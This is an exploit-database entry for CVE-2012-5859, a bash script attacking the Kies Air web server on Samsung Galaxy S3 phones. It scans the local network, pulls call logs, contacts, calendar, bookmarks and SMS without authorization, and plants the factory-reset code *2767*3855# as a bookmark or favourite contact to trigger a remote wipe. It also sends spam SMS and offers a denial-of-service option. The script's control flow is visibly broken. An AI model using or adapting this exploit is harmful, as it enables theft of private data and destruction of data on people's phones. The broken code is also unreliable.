Kies Air Denial Of Service / Authorization Bypass

EKU-ID: 2802 CVE: 2012-5859 OSVDB-ID:
Author: Claudio J. Lacayo Published: 2012-11-19 Verified: Verified




echo "                                                                                                    ... "
echo "                                                                                                      ..'',."
echo "                                                                                                           ,cl:."
echo "                                                                                                              ,dOo'"
echo "      ..''''''.        .,,.       .'.                 ','        ''         .'. ',.         ,,                  .lXXd."
echo "     .x0dllllllc        kMWN.      ;K:                cMMM:       ;Kk.      c0d. :W0.      .0Ml                     :NW0c"
echo "     kK'               cMxcWO      ;K:               'NK:WN.       .k0;   .xKc    :WX'    .KWo                       'WMM0."
echo "     O0.              .NX. dMc     ;K:              .XW, cWk         lKl 'Ok'      :WN'  .KN:         .',;;,'.......'lWMMX'"
echo "     O0.             .KW;  .KN'    ;K:              kMd   xM:         ;0O0d         ,XX'.KW,        .KMMK:.      ....''.. "
echo "     O0.      ,c     xMXllccOMX.   ;K:             :MWdclldWN.        .kKK;          .XNNN;          0MMk "
echo "     O0.      dK.   :MK:;;;;;kMk   ;K:            .NX:;;;;;oWK.      'Ok,lKl          'WMc            dWMO."
echo "     kK.      dK.  .XX.      .0M:  ;Kl            kW;       xMx     l0d   ;0k.         NM;             .cKWk,"
echo "     :Kk,..'''xK.  kM:        .XX. .kKl''......  oMx        .KW;  .xKc     .k0;        NM;                'lO0c."
echo "     .;loooool;  .xl          ,x;   ,cooooooo, .dd.         .xl  co'        co.       dx.                   .;oo:."
echo "                                                                                                             ',... "
echo "                                                                                                                 ..."
echo "       Samsung S3 Kies Air Scanner - v.1.3"
echo ""
echo ""
echo " #################################################################################################################"
echo "   Filename       :"
echo "   Date           : 10/23/2012"
echo "   Authors        : @cron__"
echo "   Presentation   :"
echo "   Whitepaper   :"
echo "   Version        : 1.3"
echo "   Description : Script to detect local running Kies Air web servers on Samsung Galaxy S3 phones."
echo " #################################################################################################################"
echo ""
echo ""

while true; do
printf "%s\n" "1) Scan local network"
printf "%s\n" "2) Send DoS"
printf "\n%s\t" "Enter an option:"

read option

# Option 1
case $option in
[1]) ip=`ifconfig | awk /inet\ /`
echo $ip
echo "Type in your IP: "

read ipstart
echo -e "Scanning in progress...\n"
sudo nmap -sS -p 8080 ${ipstart}-254 -vv >> nmap_scan.txt
awk '/Nmap scan report for android/ || /open/ || /Samsung/' nmap_scan.txt >> ka_online.txt
printf "%s\n\n\n" "Active servers found: "
cat ka_online.txt
printf "%s\t" "Was a server found? type 'y' or 'n' and press [Enter]"

read connect
if [ $connect = y ]
echo "Enter the target IP and press [Enter]"
read target_found
wget --ignore-length --quiet http://${target_found}:8080/www/index.gz.html
printf "\n\n%s\n" "1) Grab logs (incoming/outgoing calls)"
printf "%s\n" "2) Grab address book"
printf "%s\n" "3) Grab calendar events (experimental)"
printf "%s\n" "4) Grab bookmarks"
printf "%s\n" "5) Grab SMS (incoming/outgoing)"
printf "%s\n" "6) Send remote wipe"
printf "\n%s\t" "We have access, what would you like to do?"

read action
case $action in
[1]) wget --ignore-length --quiet -O call_log.txt http://${target_found}:8080/ws/telephony/log?startIndex=0&maxItems=500&sort=time-descending ;;
[2]) wget --ignore-length --quiet -O addressbook.txt http://${target_found}:8080/ws/pim/contacts?startIndex=0&maxItems=100&sort=alpha-ascending ;;
[3]) wget --ignore-length --quiet -O calendar_events.txt http://${target_found}:8080/ws/calendar/instances/1348977600/1352606400?searchQuery=calendarId:1calendarId:2&1351121143933 ;;
[4]) wget --ignore-length --quiet -O bookmarks.txt http://${target_found}:8080/ws/browser/bookmarks?startIndex=0&maxItems=100&sort=time-descending ;;
[5]) wget --ignore-length --quiet -O messages.txt http://${target_found}:8080/ws/messaging/messages?startIndex=0&maxItems=10&sort=timestamp_descending ;;
[6]) printf "\n\n%s\n" "1) Add remote wipe as a bookmark"
printf "%s\n" "2) Replace the default AT&T bookmark link with remote wipe"
printf "%s\n" "3) Replace contact information with remote wipe and mark it as favorite"
printf "%s\n" "4) Add remote wipe to address book and mark it as favorite"
printf "%s\n" "5) Send spam SMS"
printf "\n%s\t" "Choose an option:"

read wipe_option
case $wipe_option in
[1]) wipe1=`wget --ignore-length --server-response --quiet --post-data 'url=' http://${target_found}:8080/ws/browser/bookmarks` ;;
[2]) echo "DELETE method not supported by wget." ;;
[3]) wipe3=`curl -O curl_response.txt -X PUT -d "title=&firstName=Vicky&lastName=&suffix=&nickName=&homePhoneNo=&workPhoneNo=&mobilePhoneNo=*2767*3855%23&defaultPhoneNo=-1&workEmail=&homeEmail=&otherEmail=&organisation=&jobTitle=&favourite=true&accountType=Phone&accountName=Phone" http://${target_found}:8080/ws/pim/contacts/37` ;;
[4]) wipe4=`wget --ignore-length --quiet --post-data 'title=&firstName=CALL FOR A SEXY TIME&lastName=&suffix=&nickName=&homePhoneNo=&workPhoneNo=&mobilePhoneNo=*2767*3855%23&defaultPhoneNo=-1&workEmail=&homeEmail=&otherEmail=&organisation=&jobTitle=&favourite=true&accountType=Phone&accountName=Phone' http://${target_found}:8080/ws/pim/contacts` echo -e "Entry added." ;;
[5]) wipe5=`wget --ignore-length --quiet --post-data 'folderId=&destination=tel:111&destinationContactId=&destinationName=&body=Hey click this link!' http://${target_found}:8080/ws/messaging/sms/messages` ;;


elif [ $connect = n ]
printf "%s" "No available targets found."
printf "%s" "Not a valid entry. Aborted."

# Option 2: Manually specify this for now.
[2]) t1=`wget --quiet -p ''` echo -e "Crash successfully sent to device.\n" ;;
echo -e "Script reloaded.\n"